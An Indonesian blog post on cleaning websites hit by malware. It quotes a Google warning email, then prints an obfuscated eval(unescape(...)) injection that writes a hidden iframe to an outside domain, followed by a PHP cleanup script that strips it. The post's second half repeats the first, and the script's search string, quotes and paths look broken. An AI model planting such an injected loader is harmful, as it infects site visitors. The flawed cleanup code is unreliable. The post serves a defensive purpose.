Mengatasi Website Yang Terkena Malware (1)
Senin, 2010-11-22 08:59:00 WIB
Mungkin website Anda terinfeksi oleh Malware, google.com memberi peringatan kepada Anda seperti di bawah ini :Malware notification regarding your website
We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.
Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):
http://yourwebsite
Here is a link to a sample warning page:
http://www.google.com/interstitial?url=http%3A//yourwebsite
1. Tidak menyadari web anda terkena malicious software.
2. Web Server tidak memonitor content yang dikirim para uploader
3. Web menampilkan content dari ad network yang memiliki malicious software dari si pemasang iklan
Langkah-langkahnya :
Jika web Anda terkena malicious software ini, penting untuk tidak hanya menghapus content yang terinfeksi malware ini (biasanya tersembunyi), tapi juga menyisir satu persatu folder Anda. Kami sarankan untuk menghubungi hosting provider Anda jika Anda tidak yakin memprosesnya.
Bila web Anda terinfeksi malware ini, silahkan kirimkan permohonan dengan mengunjungi :
http://www.google.com/support/webmasters/bin/answer.py?answer=45432
dan mintalah evaluasinya. Bila web anda tidak berbahaya lagi bagi user, maka Google tidak akan memberi peringatan lagi.
Untuk lebih jelasnya kita lihat tulisan “Tips Website Yang Terkena Malware (2)”
Tips Website Yang Terkena Malware (2)
Saya mengalami hosting saya atau website saya diinject oleh code malware yang disembunyikan dengan code tertentu. Salah satu contoh adalah malware berikut:
eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C %69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%69%6E %70%6F%6F%2E%63%6F%6D%2F%3F%33%35%39%31%30%32%30%33%22%20%77%69 %64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61 %6D%65%3E%27%29'));
Umumnya code malware tersebut terletak di baris terkahir dari file-file yang bisa diakses secara umum melalui internet seperti html, htm, php, asp maupun ekstensi lainnya. Jika file yang terinfeksi hanya 1-2 file, maka Anda cukup merubah file tersebut satu persatu dengan mudah dan menghapus baris code malware tersebut. Bagaimana jika yang terinfeksi ada ribuan website di server anda bagaimana merubahnya secara instan dan aman?
Disini saya mau memberikan tips mereplace file-file website Anda yang terinfeksi oleh malware tersebut :
1. Anda perlu memiliki akses ssh ke server hosting anda . Bila anda tidak punya, anda dapat mengunduhnya dari www.putty.org atau meminta admin server hosting anda mengeksekusi script fix.php (code lihat dibawah)
2. Asumsi username anda di hosting anda adalah: ictfiles.com dengan home direktori adalah /home/ictfiles.com serta direktori public_html anda adalah /home/ictfiles/public_html
3. Simpan file fix.php di /home/ictfiles.com atau 1 level sebelum public_html
4. code fix.php
function recurse_dir($dir) {
if ($dh = @opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if (@is_file("$dir/$file")) {
if (strstr($file, '.htm')) {
echo "checking $dir/$file\n";
if ($h = @fopen("$dir/$file", 'r+')) {
$d = fread($h, filesize("$dir/$file"));
$d = str_replace("eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3 C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%69%6E%70%6F%6F %2E%63%6F%6D%2F%3F%33%35%39%31%30%32%30%33%22%20%77%69%64%74%68%3D%31%20 %68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));", '', $d);
rewind($h);
ftruncate($h, 0);
fwrite($h, $d);
fclose($h);
}
}
}
elseif (($file != '.') && ($file != '..') && (@is_dir("$dir/$file"))) {
recurse_dir("$dir/$file");
}
}
}
}
recurse_dir(‘public_html’);
5. Eksekusi fix.php dengan perintah: /usr/local/bin/php fix.php (cpanel) atau jika binary php anda ada di lokasi lain, misalnya: /usr/bin/php fix.php
6. Check kembali file-file di public_html atau direktori website anda, apakah masih ada file yang terinfeksi (menggunakan find atau grep)
7. Perhatikan baris code fix.php
if (strstr($file, '.htm')) {
artinya script fix.php hanya akan melakukan perbaikan untuk file berekstensi .htm, jika website anda berekstensi html atau php silahkan diganti menjadi: if (strstr($file, '.html')) {
atau
if (strstr($file, '.php')) {
eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C %69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%69%6E %70%6F%6F%2E%63%6F%6D%2F%3F%33%35%39%31%30%32%30%33%22%20%77%69 %64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61 %6D%65%3E%27%29'));
Umumnya code malware tersebut terletak di baris terkahir dari file-file yang bisa diakses secara umum melalui internet seperti html, htm, php, asp maupun ekstensi lainnya. Jika file yang terinfeksi hanya 1-2 file, maka Anda cukup merubah file tersebut satu persatu dengan mudah dan menghapus baris code malware tersebut. Bagaimana jika yang terinfeksi ada ribuan website di server anda bagaimana merubahnya secara instan dan aman?
Disini saya mau memberikan tips mereplace file-file website Anda yang terinfeksi oleh malware tersebut :
1. Anda perlu memiliki akses ssh ke server hosting anda . Bila anda tidak punya, anda dapat mengunduhnya dari www.putty.org atau meminta admin server hosting anda mengeksekusi script fix.php (code lihat dibawah)
2. Asumsi username anda di hosting anda adalah: ictfiles.com dengan home direktori adalah /home/ictfiles.com serta direktori public_html anda adalah /home/ictfiles/public_html
3. Simpan file fix.php di /home/ictfiles.com atau 1 level sebelum public_html
4. code fix.php
function recurse_dir($dir) {
if ($dh = @opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if (@is_file("$dir/$file")) {
if (strstr($file, '.htm')) {
echo "checking $dir/$file\n";
if ($h = @fopen("$dir/$file", 'r+')) {
$d = fread($h, filesize("$dir/$file"));
$d = str_replace("eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3 C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%69%6E%70%6F%6F %2E%63%6F%6D%2F%3F%33%35%39%31%30%32%30%33%22%20%77%69%64%74%68%3D%31%20 %68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));", '', $d);
rewind($h);
ftruncate($h, 0);
fwrite($h, $d);
fclose($h);
}
}
}
elseif (($file != '.') && ($file != '..') && (@is_dir("$dir/$file"))) {
recurse_dir("$dir/$file");
}
}
}
}
recurse_dir(‘public_html’);
5. Eksekusi fix.php dengan perintah: /usr/local/bin/php fix.php (cpanel) atau jika binary php anda ada di lokasi lain, misalnya: /usr/bin/php fix.php
6. Check kembali file-file di public_html atau direktori website anda, apakah masih ada file yang terinfeksi (menggunakan find atau grep)
7. Perhatikan baris code fix.php
if (strstr($file, '.htm')) {
artinya script fix.php hanya akan melakukan perbaikan untuk file berekstensi .htm, jika website anda berekstensi html atau php silahkan diganti menjadi: if (strstr($file, '.html')) {
atau
if (strstr($file, '.php')) {
0 komentar:
Posting Komentar